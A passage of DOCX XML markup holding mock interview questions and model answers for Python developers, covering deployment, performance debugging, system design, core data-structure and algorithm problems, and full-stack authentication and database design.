      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Deployment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Build a small image with pinned dependencies, a non-root user, health endpoints, and a production server such as Gunicorn with Uvicorn workers for ASGI apps. Configure environment variables, secrets, readiness/liveness probes, resource requests/limits, autoscaling, graceful shutdown, and structured logging. On Kubernetes, use Deployments, Services, HPA, ingress, and rollout strategy; on Cloud Run, tune concurrency, min instances, CPU allocation, and revision traffic splitting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. A Python API has high latency and high CPU usage in production. How would you debug and optimize it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Performance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with dashboards and traces to find which endpoint, version, dependency, or code path changed. Check CPU profiles, slow database queries, N+1 ORM calls, serialization overhead, blocking calls inside async handlers, worker saturation, GC pressure, and container CPU throttling. Optimize the real bottleneck: add indexes, reduce payloads, cache hot reads, batch calls, move CPU-heavy work to workers, tune worker counts, or scale horizontally while fixing the root cause.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. Design a URL shortener using Python. What components, data model, caching, scaling, and failure handling would you include?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a Python API service with endpoints to create and resolve short URLs, a database table mapping short_code to long_url plus owner, expiry, status, and created_at, and Redis/CDN caching for hot redirects. Generate collision-resistant codes with base62 IDs or random tokens with uniqueness checks. Redirect reads must be very fast, writes can be lower volume, analytics should go through an async event pipeline, and abuse controls should include rate limits, safe-browsing checks, and admin disablement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. Design a notification system in Python that supports email, SMS, retries, templates, rate limits, and audit logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use an API to accept notification requests, validate templates and recipients, persist an audit record, and enqueue delivery jobs. Worker services process jobs by channel, render templates, call providers, retry transient failures with backoff, and move poison messages to a dead-letter queue. Add per-tenant and per-provider rate limits, idempotency keys, delivery status tracking, provider failover where needed, and dashboards for success rate, latency, backlog, and provider errors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. Design a file upload and processing service in Python for large files, asynchronous processing, status tracking, and secure storage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use pre-signed upload URLs so clients upload large files directly to object storage instead of streaming through the Python API. Store file metadata and status in a database, trigger processing through a queue or storage event, and run workers for validation, virus scanning, parsing, thumbnails, or transformations. Track states such as uploaded, processing, failed, and completed, enforce size/type limits, encrypt storage, scan content, and expose a status endpoint with retry-safe processing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Design a real-time chat or WebSocket service in Python. How would you handle scaling, message delivery, presence, and persistence?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a Python ASGI service with WebSockets for live connections, backed by Redis Pub/Sub, Kafka, or another broker so messages can reach users connected to different replicas. Persist messages in a database, track presence with short-lived Redis keys or heartbeats, and use delivery acknowledgements for important messages. Plan for horizontal scaling, load balancer timeouts, reconnects, backpressure, rate limits, authentication on connection, and fallback APIs for history retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 54 - DSA for Python Developers Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How do you analyze time and space complexity for a Python solution?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Complexity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Count how the number of operations grows as input size n grows, ignoring constants and small lower-order terms. A single loop is often O(n), nested loops are often O(n^2), binary search is O(log n), and sorting is usually O(n log n). Space complexity counts extra memory such as hash maps, recursion stack, queues, or copied lists. In Python, also remember that slicing, list membership, and string concatenation may hide extra time or memory costs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. How would you solve Two Sum in Python, and what is the time complexity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Arrays</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a dictionary from number to index. Iterate through nums, compute complement = target - nums[i], and check whether the complement is already in the dictionary. If yes, return the stored index and current index; otherwise store nums[i]. This is O(n) time and O(n) extra space, much better than the O(n^2) brute-force pair check.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How would you check whether two strings are anagrams in Python?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Strings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: If the lengths differ, return false. Then either compare Counter(s1) == Counter(s2), which is clear and O(n), or count characters manually in a dictionary. Sorting both strings also works but costs O(n log n). In interviews, mention case sensitivity, spaces, punctuation, and Unicode assumptions before choosing the implementation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How would you find the longest substring without repeating characters?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Sliding Window</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a sliding window with a left pointer and a dictionary mapping each character to its latest index. Move the right pointer through the string; when a repeated character appears inside the current window, move left to one position after the previous occurrence. Track the maximum window length. This is O(n) time and O(min(n, alphabet size)) space.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. When would you use the two-pointer technique, and how would you apply it to a sorted array?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Two Pointers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use two pointers when the input is sorted or when you need to compare/move from both ends, compact in place, merge, or maintain a window. For a sorted two-sum style problem, place left at the start and right at the end. If nums[left] + nums[right] is too small, move left forward; if too large, move right backward; if equal, you found the answer. This is O(n).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Why are hash maps useful in coding interviews, and what are common pitfalls in Python dictionaries?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Hashing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Hash maps give average O(1) lookup, insert, and update, which often turns nested-loop searches into linear-time solutions. They are useful for frequency counts, seen sets, index lookup, grouping, and memoization. Pitfalls include assuming order in older Python versions, using mutable objects as keys, forgetting that worst-case hashing can degrade, and accidentally overwriting values when duplicates matter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How would you validate balanced parentheses using a stack?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Stack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Push opening brackets onto a stack. For each closing bracket, check that the stack is not empty and that the top opening bracket matches the closing bracket. Pop on a match; otherwise return false. At the end, the stack must be empty. This is O(n) time and O(n) space in the worst case.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. When would you use a queue or deque in Python, and why is list.pop(0) usually avoided?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Queue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a queue for FIFO processing such as BFS, task scheduling, or level-order traversal. In Python, collections.deque is preferred because append and popleft are O(1). list.pop(0) is usually avoided because removing from the front shifts all remaining elements left, making it O(n) per operation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How would you detect a cycle in a linked list?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Linked List</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use Floyd's tortoise and hare algorithm. Move slow one step and fast two steps. If there is a cycle, fast will eventually meet slow; if fast reaches None, there is no cycle. This uses O(n) time and O(1) space. An alternative is a visited set, but that uses O(n) extra memory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How would you perform BFS and DFS traversal of a binary tree?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Trees</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: For BFS, use a queue/deque starting with the root, pop nodes from the left, visit them, and push children. For DFS, use recursion or an explicit stack for preorder, inorder, or postorder traversal. BFS is useful for level-order and shortest path in unweighted graphs; DFS is useful for exploring structure, recursion problems, and tree properties. Both are O(n) time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How would you use binary search to find the first occurrence of a target in a sorted array?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Binary Search</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Maintain left and right bounds and an answer initialized to -1. When mid equals target, store mid as a candidate answer and move right to mid - 1 to search for an earlier occurrence. If nums[mid] is less than target, move left to mid + 1; otherwise move right to mid - 1. This is O(log n) time and O(1) space.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How would you find the top K frequent elements using a heap or Counter in Python?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Heap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Count frequencies with collections.Counter. For clarity, Counter(nums).most_common(k) returns the top k by frequency. For a heap approach, maintain a min-heap of size k containing (frequency, value); push each item and pop when heap size exceeds k. Counting is O(n), and the heap method is O(m log k), where m is the number of unique elements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. How would you detect whether an undirected graph has a cycle?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Graphs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use DFS with a visited set and parent tracking. For each unvisited node, DFS through its neighbors; if you see a visited neighbor that is not the parent, a cycle exists. This is O(V + E). Another good approach is Union-Find: for each edge, if both vertices already have the same root, adding that edge creates a cycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. How do recursion and backtracking work, and what should you watch out for in Python?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Recursion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Recursion solves a problem by calling the same function on smaller subproblems with a clear base case. Backtracking explores choices, recurses, then undoes the choice to explore alternatives, often used for permutations, subsets, combinations, and constraint problems. In Python, watch recursion depth, mutable shared state, missing base cases, and exponential branching; use iterative solutions or memoization when appropriate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. How would you explain dynamic programming using the climbing stairs problem?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Dynamic Programming</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Dynamic programming applies when a problem has overlapping subproblems and optimal substructure. In climbing stairs, ways(n) = ways(n - 1) + ways(n - 2), because the last step came from one step below or two steps below. A naive recursive solution repeats work; memoization or bottom-up iteration makes it O(n) time. Since only the last two values are needed, space can be optimized to O(1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. How do you approach a new DSA problem in an interview from clarification to optimized solution?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Interview Strategy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Clarify inputs, outputs, constraints, edge cases, and whether duplicates/order matter. Start with a simple brute-force solution and explain its complexity. Look for patterns such as hashing, two pointers, sliding window, binary search, stack, heap, graph traversal, or DP. Then propose the optimized approach, walk through an example, code cleanly, test edge cases, and discuss time/space complexity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 55 - Full Stack Python Engineer with DSA, DevOps, and GenAI Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How would you design and build a full-stack application using Python for the backend and a modern JavaScript frontend?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Full Stack/Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a Python backend such as FastAPI or Django for APIs, business logic, auth, database access, background jobs, and integrations. Use React, Next.js, or another frontend framework for UI, routing, state, forms, and API calls. Define API contracts with OpenAPI, use PostgreSQL for transactional data, Redis for caching or sessions, object storage for files, and a queue for slow work. Deploy frontend and backend separately, add CI/CD, tests, observability, and environment-specific configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. How would you design authentication, authorization, and session management for a full-stack Python application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Backend/API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a standard identity flow such as OAuth2/OIDC or secure username/password with hashed passwords and MFA where needed. Store sessions in secure HttpOnly cookies or use short-lived JWTs with refresh-token rotation. Authorization should be enforced server-side with roles, scopes, or policy checks per resource, not only hidden frontend buttons. Add CSRF protection for cookie-based auth, rate limiting on login, audit logs for sensitive actions, and secret storage outside code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How would you design models, migrations, indexes, and API contracts for a Python backend connected to PostgreSQL?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Backend/Database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start from domain entities and access patterns, then design tables with primary keys, foreign keys, unique constraints, and useful indexes. Use SQLAlchemy/Alembic or Django ORM/migrations so schema changes are versioned and reviewed. Keep API request/response schemas explicit with Pydantic, serializers, or OpenAPI. Watch for N+1 queries, missing indexes, unsafe migrations, and backward compatibility between API and database changes during deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How would the frontend handle API errors, loading states, pagination, authentication tokens, and form validation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Frontend/Integration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a consistent API client layer that attaches auth safely, handles 401/403/429/5xx responses, and maps backend validation errors to user-friendly form messages. Show loading, empty, error, and success states intentionally. Use cursor or page-based pagination depending on backend contract, debounce search/filter requests, and avoid storing sensitive tokens in localStorage when safer cookie-based approaches are available. Frontend validation improves UX, but backend validation remains authoritative.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Which DSA patterns are most important for a Python full-stack engineer, and how would you practice them?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
